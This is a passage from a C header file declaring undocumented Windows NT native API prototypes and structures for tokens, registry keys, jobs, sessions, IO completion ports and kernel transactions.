    TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE | \
    TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE | \
    TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY | \
    TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT | \
    TOKEN_SECURITY_ATTRIBUTE_DISABLED | \
    TOKEN_SECURITY_ATTRIBUTE_MANDATORY)

#define TOKEN_SECURITY_ATTRIBUTE_CUSTOM_FLAGS 0xffff0000

typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE {
    ULONG64 Version;
    UNICODE_STRING Name;
} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;

typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE {
    PVOID pValue;
    ULONG ValueLength;
} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;

typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1 {
    UNICODE_STRING Name;
    USHORT ValueType;
    USHORT Reserved;
    ULONG Flags;
    ULONG ValueCount;
    union {
        PLONG64 pInt64;
        PULONG64 pUint64;
        PUNICODE_STRING pString;
        PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;
        PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;
    } Values;
} TOKEN_SECURITY_ATTRIBUTE_V1, *PTOKEN_SECURITY_ATTRIBUTE_V1;

#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1 1
#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1

typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION {
    USHORT Version;
    USHORT Reserved;
    ULONG AttributeCount;
    union {
        PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;
    } Attribute;
} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, *PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;

//
// endof ntseapi.h
//

NTSYSAPI
NTSTATUS
NTAPI
NtAccessCheck(
    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
    _In_ HANDLE ClientToken,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ PGENERIC_MAPPING GenericMapping,
    _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
    _Inout_ PULONG PrivilegeSetLength,
    _Out_ PACCESS_MASK GrantedAccess,
    _Out_ PNTSTATUS AccessStatus);

NTSYSAPI
NTSTATUS
NTAPI
NtAccessCheckByType(
    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
    _In_opt_ PSID PrincipalSelfSid,
    _In_ HANDLE ClientToken,
    _In_ ACCESS_MASK DesiredAccess,
    _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,
    _In_ ULONG ObjectTypeListLength,
    _In_ PGENERIC_MAPPING GenericMapping,
    _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
    _Inout_ PULONG PrivilegeSetLength,
    _Out_ PACCESS_MASK GrantedAccess,
    _Out_ PNTSTATUS AccessStatus);

NTSYSAPI
NTSTATUS
NTAPI
NtAccessCheckByTypeResultList(
    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
    _In_opt_ PSID PrincipalSelfSid,
    _In_ HANDLE ClientToken,
    _In_ ACCESS_MASK DesiredAccess,
    _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,
    _In_ ULONG ObjectTypeListLength,
    _In_ PGENERIC_MAPPING GenericMapping,
    _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
    _Inout_ PULONG PrivilegeSetLength,
    _Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess,
    _Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenObjectAuditAlarm(
    _In_ PUNICODE_STRING SubsystemName,
    _In_opt_ PVOID HandleId,
    _In_ PUNICODE_STRING ObjectTypeName,
    _In_ PUNICODE_STRING ObjectName,
    _In_opt_ PSECURITY_DESCRIPTOR SecurityDescriptor,
    _In_ HANDLE ClientToken,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ ACCESS_MASK GrantedAccess,
    _In_opt_ PPRIVILEGE_SET Privileges,
    _In_ BOOLEAN ObjectCreation,
    _In_ BOOLEAN AccessGranted,
    _Out_ PBOOLEAN GenerateOnClose);

NTSYSAPI
NTSTATUS
NTAPI
NtCloseObjectAuditAlarm(
    _In_ PUNICODE_STRING SubsystemName,
    _In_opt_ PVOID HandleId,
    _In_ BOOLEAN GenerateOnClose);

NTSYSAPI
NTSTATUS
NTAPI
NtDeleteObjectAuditAlarm(
    _In_ PUNICODE_STRING SubsystemName,
    _In_opt_ PVOID HandleId,
    _In_ BOOLEAN GenerateOnClose);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcessToken(
    _In_ HANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _Out_ PHANDLE TokenHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcessTokenEx(
    _In_ HANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ ULONG HandleAttributes,
    _Out_ PHANDLE TokenHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtDuplicateToken(
    _In_ HANDLE ExistingTokenHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ BOOLEAN EffectiveOnly,
    _In_ TOKEN_TYPE TokenType,
    _Out_ PHANDLE NewTokenHandle);

#ifndef DISABLE_MAX_PRIVILEGE
#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
#endif
#ifndef SANDBOX_INERT
#define SANDBOX_INERT 0x2 // winnt
#endif
#ifndef LUA_TOKEN
#define LUA_TOKEN 0x4 // winnt
#endif
#ifndef WRITE_RESTRICTED
#define WRITE_RESTRICTED 0x8 // winnt
#endif

NTSYSAPI
NTSTATUS
NTAPI
NtFilterToken(
    _In_ HANDLE ExistingTokenHandle,
    _In_ ULONG Flags,
    _In_opt_ PTOKEN_GROUPS SidsToDisable,
    _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
    _In_opt_ PTOKEN_GROUPS RestrictedSids,
    _Out_ PHANDLE NewTokenHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtImpersonateAnonymousToken(
    _In_ HANDLE ThreadHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationToken(
    _In_ HANDLE TokenHandle,
    _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
    _Out_writes_bytes_to_opt_(TokenInformationLength, *ReturnLength) PVOID TokenInformation,
    _In_ ULONG TokenInformationLength,
    _Out_ PULONG ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationToken(
    _In_ HANDLE TokenHandle,
    _In_
TOKEN_INFORMATION_CLASS TokenInformationClass,
    _In_reads_bytes_(TokenInformationLength) PVOID TokenInformation,
    _In_ ULONG TokenInformationLength);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenThreadToken(
    _In_ HANDLE ThreadHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ BOOLEAN OpenAsSelf,
    _Out_ PHANDLE TokenHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenThreadTokenEx(
    _In_ HANDLE ThreadHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ BOOLEAN OpenAsSelf,
    _In_ ULONG HandleAttributes,
    _Out_ PHANDLE TokenHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtAdjustPrivilegesToken(
    _In_ HANDLE TokenHandle,
    _In_ BOOLEAN DisableAllPrivileges,
    _In_opt_ PTOKEN_PRIVILEGES NewState,
    _In_ ULONG BufferLength,
    _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtAdjustGroupsToken(
    _In_ HANDLE TokenHandle,
    _In_ BOOLEAN ResetToDefault,
    _In_opt_ PTOKEN_GROUPS NewState,
    _In_opt_ ULONG BufferLength,
    _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtCompareTokens(
    _In_ HANDLE FirstTokenHandle,
    _In_ HANDLE SecondTokenHandle,
    _Out_ PBOOLEAN Equal);

NTSYSAPI
NTSTATUS
NTAPI
NtPrivilegeCheck(
    _In_ HANDLE ClientToken,
    _Inout_ PPRIVILEGE_SET RequiredPrivileges,
    _Out_ PBOOLEAN Result);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateToken(
    _Out_ PHANDLE TokenHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ TOKEN_TYPE TokenType,
    _In_ PLUID AuthenticationId,
    _In_ PLARGE_INTEGER ExpirationTime,
    _In_ PTOKEN_USER User,
    _In_ PTOKEN_GROUPS Groups,
    _In_ PTOKEN_PRIVILEGES Privileges,
    _In_opt_ PTOKEN_OWNER Owner,
    _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,
    _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,
    _In_ PTOKEN_SOURCE TokenSource);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateTokenEx(
    _Out_ PHANDLE TokenHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ TOKEN_TYPE TokenType,
    _In_ PLUID AuthenticationId,
    _In_
PLARGE_INTEGER ExpirationTime,
    _In_ PTOKEN_USER User,
    _In_ PTOKEN_GROUPS Groups,
    _In_ PTOKEN_PRIVILEGES Privileges,
    _In_opt_ PVOID UserAttributes, // points to TOKEN_SECURITY_ATTRIBUTES_INFORMATION
    _In_opt_ PVOID DeviceAttributes, // points to PTOKEN_SECURITY_ATTRIBUTES_INFORMATION
    _In_opt_ PTOKEN_GROUPS DeviceGroups,
    _In_opt_ PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy,
    _In_opt_ PTOKEN_OWNER Owner,
    _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,
    _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,
    _In_ PTOKEN_SOURCE TokenSource);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateLowBoxToken(
    _Out_ PHANDLE TokenHandle,
    _In_ HANDLE ExistingTokenHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ PSID PackageSid,
    _In_ ULONG CapabilityCount,
    _In_reads_opt_(CapabilityCount) PSID_AND_ATTRIBUTES Capabilities,
    _In_ ULONG HandleCount,
    _In_reads_opt_(HandleCount) HANDLE *Handles);

/************************************************************************************
*
* Registry API.
*
************************************************************************************/

NTSYSAPI
NTSTATUS
NTAPI
NtCreateKey(
    _Out_ PHANDLE KeyHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _Reserved_ ULONG TitleIndex,
    _In_opt_ PUNICODE_STRING Class,
    _In_ ULONG CreateOptions,
    _Out_opt_ PULONG Disposition);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateKeyTransacted(
    _Out_ PHANDLE KeyHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _Reserved_ ULONG TitleIndex,
    _In_opt_ PUNICODE_STRING Class,
    _In_ ULONG CreateOptions,
    _In_ HANDLE TransactionHandle,
    _Out_opt_ PULONG Disposition);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenKey(
    _Out_ PHANDLE KeyHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenKeyEx(
    _Out_ PHANDLE KeyHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG OpenOptions);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenKeyTransacted(
    _Out_ PHANDLE KeyHandle,
    _In_
ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE TransactionHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenKeyTransactedEx(
    _Out_ PHANDLE KeyHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG OpenOptions,
    _In_ HANDLE TransactionHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryKey(
    _In_ HANDLE KeyHandle,
    _In_ KEY_INFORMATION_CLASS KeyInformationClass,
    _Out_writes_bytes_opt_(Length) PVOID KeyInformation,
    _In_ ULONG Length,
    _Out_ PULONG ResultLength);

NTSYSAPI
NTSTATUS
NTAPI
NtEnumerateKey(
    _In_ HANDLE KeyHandle,
    _In_ ULONG Index,
    _In_ KEY_INFORMATION_CLASS KeyInformationClass,
    _Out_writes_bytes_opt_(Length) PVOID KeyInformation,
    _In_ ULONG Length,
    _Out_ PULONG ResultLength);

NTSYSAPI
NTSTATUS
NTAPI
NtEnumerateValueKey(
    _In_ HANDLE KeyHandle,
    _In_ ULONG Index,
    _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,
    _In_ ULONG Length,
    _Out_ PULONG ResultLength);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryValueKey(
    _In_ HANDLE KeyHandle,
    _In_ PUNICODE_STRING ValueName,
    _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,
    _In_ ULONG Length,
    _Out_ PULONG ResultLength);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryMultipleValueKey(
    _In_ HANDLE KeyHandle,
    _Inout_updates_(EntryCount) PKEY_VALUE_ENTRY ValueEntries,
    _In_ ULONG EntryCount,
    _Out_writes_bytes_(*BufferLength) PVOID ValueBuffer,
    _Inout_ PULONG BufferLength,
    _Out_opt_ PULONG RequiredBufferLength);

NTSYSAPI
NTSTATUS
NTAPI
NtSetValueKey(
    _In_ HANDLE KeyHandle,
    _In_ PUNICODE_STRING ValueName,
    _In_ ULONG TitleIndex,
    _In_ ULONG Type,
    _In_reads_bytes_opt_(DataSize) PVOID Data,
    _In_ ULONG DataSize);

NTSYSAPI
NTSTATUS
NTAPI
NtDeleteKey(
    _In_ HANDLE KeyHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtDeleteValueKey(
    _In_ HANDLE KeyHandle,
    _In_ PUNICODE_STRING ValueName);

NTSYSAPI
NTSTATUS
NTAPI
NtRenameKey(
    _In_ HANDLE KeyHandle,
    _In_ PUNICODE_STRING NewName);

NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationKey(
    _In_ HANDLE KeyHandle,
    _In_ KEY_SET_INFORMATION_CLASS KeySetInformationClass,
    _In_reads_bytes_(KeySetInformationLength) PVOID KeySetInformation,
    _In_ ULONG KeySetInformationLength);

NTSYSAPI
NTSTATUS
NTAPI
NtFlushKey(
    _In_ HANDLE KeyHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtCompressKey(
    _In_ HANDLE Key);

NTSYSAPI
NTSTATUS
NTAPI
NtLoadKey(
    _In_ POBJECT_ATTRIBUTES TargetKey,
    _In_ POBJECT_ATTRIBUTES SourceFile);

NTSYSAPI
NTSTATUS
NTAPI
NtLoadKey2(
    _In_ POBJECT_ATTRIBUTES TargetKey,
    _In_ POBJECT_ATTRIBUTES SourceFile,
    _In_ ULONG Flags);

//https://gist.github.com/tyranid/1db47869da253a912242c694e921009d#file-ntloadkeyex3-h
typedef enum _KEY_LOAD_HANDLE_TYPE {
    KeyLoadTrustKey = 1,
    KeyLoadEvent,
    KeyLoadToken
} KEY_LOAD_HANDLE_TYPE;

typedef struct _KEY_LOAD_HANDLE {
    KEY_LOAD_HANDLE_TYPE Type;
    HANDLE Handle;
} KEY_LOAD_HANDLE, *PKEY_LOAD_HANDLE;

NTSYSAPI
NTSTATUS
NTAPI
NtLoadKey3(
    _In_ POBJECT_ATTRIBUTES TargetKey,
    _In_ POBJECT_ATTRIBUTES SourceFile,
    _In_ ULONG Flags,
    _In_ PKEY_LOAD_HANDLE LoadEntries,
    _In_ ULONG LoadEntryCount,
    _In_opt_ ACCESS_MASK DesiredAccess,
    _Out_opt_ PHANDLE RootHandle,
    _In_ PVOID Unused);

NTSYSAPI
NTSTATUS
NTAPI
NtLoadKeyEx(
    _In_ POBJECT_ATTRIBUTES TargetKey,
    _In_ POBJECT_ATTRIBUTES SourceFile,
    _In_ ULONG Flags,
    _In_opt_ HANDLE TrustClassKey,
    _In_opt_ HANDLE Event,
    _In_opt_ ACCESS_MASK DesiredAccess,
    _Out_opt_ PHANDLE RootHandle,
    _Out_opt_ PIO_STATUS_BLOCK IoStatus);

NTSYSAPI
NTSTATUS
NTAPI
NtSaveKey(
    _In_ HANDLE KeyHandle,
    _In_ HANDLE FileHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtSaveKeyEx(
    _In_ HANDLE KeyHandle,
    _In_ HANDLE FileHandle,
    _In_ ULONG Format);

NTSYSAPI
NTSTATUS
NTAPI
NtUnloadKey(
    _In_ POBJECT_ATTRIBUTES TargetKey);

NTSYSAPI
NTSTATUS
NTAPI
NtUnloadKey2(
    _In_ POBJECT_ATTRIBUTES TargetKey,
    _In_ ULONG Flags);

NTSYSAPI
NTSTATUS
NTAPI
NtUnloadKeyEx(
    _In_ POBJECT_ATTRIBUTES TargetKey,
    _In_opt_ HANDLE Event);

NTSYSAPI
NTSTATUS
NTAPI
NtNotifyChangeKey(
    _In_ HANDLE KeyHandle,
    _In_opt_ HANDLE Event,
    _In_opt_ PIO_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcContext,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_ ULONG CompletionFilter,
    _In_ BOOLEAN WatchTree,
    _Out_writes_bytes_opt_(BufferSize) PVOID Buffer,
    _In_ ULONG BufferSize,
    _In_ BOOLEAN Asynchronous);

NTSYSAPI
NTSTATUS
NTAPI
NtLockRegistryKey(
    _In_ HANDLE KeyHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateRegistryTransaction(
    _Out_ PHANDLE Handle,
    _In_ ACCESS_MASK DesiredAccess, //generic + TRANSACTION_*
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ DWORD Flags);

NTSYSAPI
NTSTATUS
NTAPI
NtCommitRegistryTransaction(
    _In_ HANDLE RegistryHandle,
    _In_ BOOL Wait);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenRegistryTransaction(
    _Out_ PHANDLE RegistryHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtRollbackRegistryTransaction(
    _In_ HANDLE RegistryHandle,
    _In_ BOOL Wait);

/************************************************************************************
*
* Job API.
*
************************************************************************************/

NTSYSAPI
NTSTATUS
NTAPI
NtAssignProcessToJobObject(
    _In_ HANDLE JobHandle,
    _In_ HANDLE ProcessHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateJobObject(
    _Out_ PHANDLE JobHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateJobSet(
    _In_ ULONG NumJob,
    _In_reads_(NumJob) PJOB_SET_ARRAY UserJobSet,
    _In_ ULONG Flags);

NTSYSAPI
NTSTATUS
NTAPI
NtIsProcessInJob(
    _In_ HANDLE ProcessHandle,
    _In_opt_ HANDLE JobHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenJobObject(
    _Out_ PHANDLE JobHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationJobObject(
    _In_opt_ HANDLE JobHandle,
    _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,
    _Out_writes_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,
    _In_ ULONG JobObjectInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationJobObject(
    _In_ HANDLE JobHandle,
    _In_
JOBOBJECTINFOCLASS JobObjectInformationClass,
    _In_reads_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,
    _In_ ULONG JobObjectInformationLength);

NTSYSAPI
NTSTATUS
NTAPI
NtTerminateJobObject(
    _In_ HANDLE JobHandle,
    _In_ NTSTATUS ExitStatus);

/************************************************************************************
*
* Session API.
*
************************************************************************************/

typedef struct _SESSION_OBJECT {
    KEVENT Event;
    PVOID SessionGlobal; //MM_SESSION_SPACE ptr
} SESSION_OBJECT, * PSESSION_OBJECT;

//taken from ph2
typedef enum _IO_SESSION_EVENT {
    IoSessionEventIgnore,
    IoSessionEventCreated,
    IoSessionEventTerminated,
    IoSessionEventConnected,
    IoSessionEventDisconnected,
    IoSessionEventLogon,
    IoSessionEventLogoff,
    IoSessionEventMax
} IO_SESSION_EVENT;

typedef enum _IO_SESSION_STATE {
    IoSessionStateCreated = 1,
    IoSessionStateInitialized,
    IoSessionStateConnected,
    IoSessionStateDisconnected,
    IoSessionStateDisconnectedLoggedOn,
    IoSessionStateLoggedOn,
    IoSessionStateLoggedOff,
    IoSessionStateTerminated,
    IoSessionStateMax
} IO_SESSION_STATE;

NTSYSAPI
NTSTATUS
NTAPI
NtOpenSession(
    _Out_ PHANDLE SessionHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtNotifyChangeSession(
    _In_ HANDLE SessionHandle,
    _In_ ULONG ChangeSequenceNumber,
    _In_ PLARGE_INTEGER ChangeTimeStamp,
    _In_ IO_SESSION_EVENT Event,
    _In_ IO_SESSION_STATE NewState,
    _In_ IO_SESSION_STATE PreviousState,
    _In_reads_bytes_opt_(PayloadSize) PVOID Payload,
    _In_ ULONG PayloadSize);

/************************************************************************************
*
* IO Completion API.
*
************************************************************************************/

typedef enum _IO_COMPLETION_INFORMATION_CLASS {
    IoCompletionBasicInformation
} IO_COMPLETION_INFORMATION_CLASS;

typedef struct _IO_COMPLETION_BASIC_INFORMATION {
    LONG Depth;
} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;

NTSYSAPI
NTSTATUS
NTAPI
NtCreateIoCompletion(
    _Out_ PHANDLE IoCompletionHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG Count);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenIoCompletion(
    _Out_ PHANDLE IoCompletionHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryIoCompletion(
    _In_ HANDLE IoCompletionHandle,
    _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,
    _Out_writes_bytes_(IoCompletionInformationLength) PVOID IoCompletionInformation,
    _In_ ULONG IoCompletionInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtSetIoCompletion(
    _In_ HANDLE IoCompletionHandle,
    _In_opt_ PVOID KeyContext,
    _In_opt_ PVOID ApcContext,
    _In_ NTSTATUS IoStatus,
    _In_ ULONG_PTR IoStatusInformation);

NTSYSAPI
NTSTATUS
NTAPI
NtSetIoCompletionEx(
    _In_ HANDLE IoCompletionHandle,
    _In_ HANDLE IoCompletionPacketHandle,
    _In_opt_ PVOID KeyContext,
    _In_opt_ PVOID ApcContext,
    _In_ NTSTATUS IoStatus,
    _In_ ULONG_PTR IoStatusInformation);

NTSYSAPI
NTSTATUS
NTAPI
NtRemoveIoCompletion(
    _In_ HANDLE IoCompletionHandle,
    _Out_ PVOID *KeyContext,
    _Out_ PVOID *ApcContext,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_opt_ PLARGE_INTEGER Timeout);

/************************************************************************************
*
* Transactions API.
*
************************************************************************************/

//TmTx
NTSYSAPI
NTSTATUS
NTAPI
NtCreateTransaction(
    _Out_ PHANDLE TransactionHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ LPGUID Uow,
    _In_opt_ HANDLE TmHandle,
    _In_ ULONG CreateOptions,
    _In_ ULONG IsolationLevel,
    _In_ ULONG IsolationFlags,
    _In_opt_ PLARGE_INTEGER Timeout,
    _In_opt_ PUNICODE_STRING Description);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenTransaction(
    _Out_ PHANDLE TransactionHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ LPGUID Uow,
    _In_opt_ HANDLE TmHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtRollbackTransaction(
    _In_ HANDLE TransactionHandle,
    _In_ BOOLEAN Wait);

NTSYSAPI
NTSTATUS
NTAPI
NtCommitTransaction(
    _In_ HANDLE TransactionHandle,
    _In_ BOOLEAN Wait);

NTSYSAPI
NTSTATUS
NTAPI
NtFreezeTransactions(
    _In_ PLARGE_INTEGER FreezeTimeout,
    _In_ PLARGE_INTEGER ThawTimeout);

NTSYSAPI
NTSTATUS
NTAPI
NtThawTransactions(
    VOID);

//TmRm
NTSYSAPI
NTSTATUS
NTAPI
NtCreateResourceManager(
    _Out_ PHANDLE ResourceManagerHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE TmHandle,
    _In_opt_ LPGUID ResourceManagerGuid,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG CreateOptions,
    _In_opt_ PUNICODE_STRING Description);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenResourceManager(
    _Out_ PHANDLE ResourceManagerHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE TmHandle,
    _In_opt_ LPGUID ResourceManagerGuid,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);

//TmEn
NTSYSAPI
NTSTATUS
NTAPI
NtCreateEnlistment(
    _Out_ PHANDLE EnlistmentHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE ResourceManagerHandle,
    _In_ HANDLE TransactionHandle,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ ULONG CreateOptions,
    _In_ NOTIFICATION_MASK NotificationMask,
    _In_opt_ PVOID EnlistmentKey);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenEnlistment(
    _Out_ PHANDLE EnlistmentHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE ResourceManagerHandle,
    _In_ LPGUID EnlistmentGuid,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);

//TmTm
NTSYSAPI
NTSTATUS
NTAPI
NtCreateTransactionManager(
    _Out_ PHANDLE TmHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ PUNICODE_STRING LogFileName,
    _In_ ULONG CreateOptions,
    _In_ ULONG CommitStrength);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenTransactionManager(
    _Out_ PHANDLE TmHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ PUNICODE_STRING LogFileName,
    _In_opt_ LPGUID TmIdentity,
    _In_ ULONG OpenOptions);

/************************************************************************************
*
* Performance Counter.
*
************************************************************************************/

NTSYSAPI
NTSTATUS
NTAPI
NtQueryPerformanceCounter(
    _Out_ PLARGE_INTEGER PerformanceCounter,
    _Out_opt_ PLARGE_INTEGER PerformanceFrequency);

NTSYSAPI
NTSTATUS
NTAPI
NtConvertBetweenAuxiliaryCounterAndPerformanceCounter(
    _In_ BOOLEAN ConvertAuxiliaryToPerformanceCounter,
    _In_ PLARGE_INTEGER PerformanceOrAuxiliaryCounterValue,
    _Out_ PLARGE_INTEGER ConvertedValue,
    _Out_opt_ PLARGE_INTEGER ConversionError);

/************************************************************************************
*
* Process and Thread API.
*
************************************************************************************/

typedef struct _INITIAL_TEB {
    struct {
        PVOID OldStackBase;
        PVOID OldStackLimit;
    } OldInitialTeb;
    PVOID StackBase;
    PVOID StackLimit;
    PVOID StackAllocationBase;
} INITIAL_TEB, * PINITIAL_TEB;

#define PROCESS_GET_NEXT_FLAGS_PREVIOUS_PROCESS 0x00000001

#define QUEUE_USER_APC_FLAGS_NONE 0
#define QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 1

//
// NtCreateProcessEx specific flags.
//
